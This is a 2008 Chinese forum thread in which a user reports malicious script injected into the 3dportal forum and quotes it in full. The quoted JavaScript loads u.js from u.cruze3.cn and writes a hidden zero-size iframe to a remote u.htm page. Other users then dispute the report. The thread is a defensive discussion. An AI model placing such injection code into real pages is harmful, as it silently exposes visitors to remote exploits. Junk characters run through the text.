此网被挂马

czy12

马:Hack.Exploit.Script.JS.Mixed.c

1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script>
   
2. 
   . Q: D; c) S' m  n- e2 O" h
3. document.writeln("<script>";
   & e* C$ v7 V5 P* V
4. document.writeln("function oK_Begin(){";
   
5. document.writeln("var Then = new Date() ";
   3 n* d5 f% y" d
6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
   # F7 d. g) I2 S- s# @: k
7. document.writeln("var cookieString = new String(document.cookie)";
   0 m; M5 P) r( Q7 A4 q# F
8. document.writeln("var cookieHeader = "Cookie1=" ";
   ! L  B( Q& M: {" G
9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
   " }( e5 W  Y1 }  @
10. document.writeln("if (beginPosition != -1){ ";
    + Z/ l6 A; i" s6 i
11. document.writeln("} else ";
    6 y2 l* ^6 c5 C
12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";
    : I9 z; \) m" @  W
13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
    
14. document.writeln("}";
    8 [( B. l! b0 h. a' i/ z! |
15. document.writeln("}";
    9 g# ~6 t1 V3 V  l
16. document.writeln("oK_Begin();";
    
17. document.writeln("<\/script>";
    
18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"
    2 [& R5 Y" N5 B+ z; q
19. 
    
20. 
    % W0 b; b: L9 T. k% B/ X
21. 
    
22. 
    
23. 
    

复制代码

虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马

19720205

请管理员确认是否网页挂马?

cayuer

我的麦咖啡都没检测出来 你什么杀毒软件？

czy12

不是杀软件查的.
' S' Y3 F4 Z( P只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
不过,已经被清理了.
% v- a. H+ ]: G4 ?5 K7 k- b: l
HEHE只是没有礼貌

[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]

江南有雪

你这个什么网站，哪里出来的？
* ]5 g6 r# N) K+ m* I
& Y$ Y* L* D6 A9 S5 Rht tp://u.cruze3.cn/u.js

czy12

http://u.cruze3.cn/u.js
: S& A) J; M$ b" B此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
3 {; J  e; L! G' l; }这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
3 J5 r9 F% X3 s3 f- CHEHE

wwqq

这跟三维有什么关系？

czy12

这是挂在三维网论坛里的.
红线所指

huang_baker

奇怪，为什么我的里面没有？是不是楼主的机器自己带病毒了？

小雪

自己的机子中毒了，就不要满天喊叫了，没人会认为你是一个杀毒的行家

czy12

不学无术.
/ t" J4 ~1 A& ^/ R, p6 kHEHE

yyywwwhk

但在:
- c4 Y! I) D2 i9 s; Xhttp://www.3dportal.cn/discuz/ 之原始檔
似乎看不见楼主所说的 http://u.cruze3.cn/u.js

[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]

新洁电子

经过自编扫描代码处理结果，未发现楼主说的挂马代码！
8 g( t  A: {) I/ H) P
* k5 F4 m" k  D+ }1 V) J请清理自己计算机的缓冲区！

college

看您的尾符/script，很像是U盘病毒。

czy12

DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
9 v2 H% x$ ]% M$ N! u6 ]2 P3 a我也说了：已修复。

( d$ [6 n( N8 @$ j8 wps:这与缓存毫无关系。虽然缓存中有U.JS.
! k" ^; w# s& h! }但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?
1 p0 F. b9 h$ C- g+ Z( y
script是个JAVA代码,与U盘何关?

0 R; F0 B! p) H* h, L/ u' M0 x9 AHEHE
# W: C$ R7 K+ D4 Q6 d) ]
) _# \3 l8 P, S# G6 [. m9 \) l[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]

新洁电子

非也，代码是程序直接采样的当时的网页代码，是自编的，算不上权威，但是可以直接进入部分加密网站！
  y/ l# z) x& ]6 X. k
2 i  L6 |$ o9 s7 F+ s如果却如你说的修改了，我想，这只有论坛管理员有这个权限，即便是后台也是有记录的。假如确实是论坛后台修改了，一定会给大伙一个说法的。

+ d8 m5 I, u0 {  W相反，目前从各方面提供的代码显示，确实“此时此刻”是正常的！至于继续讨论已经无大的价值！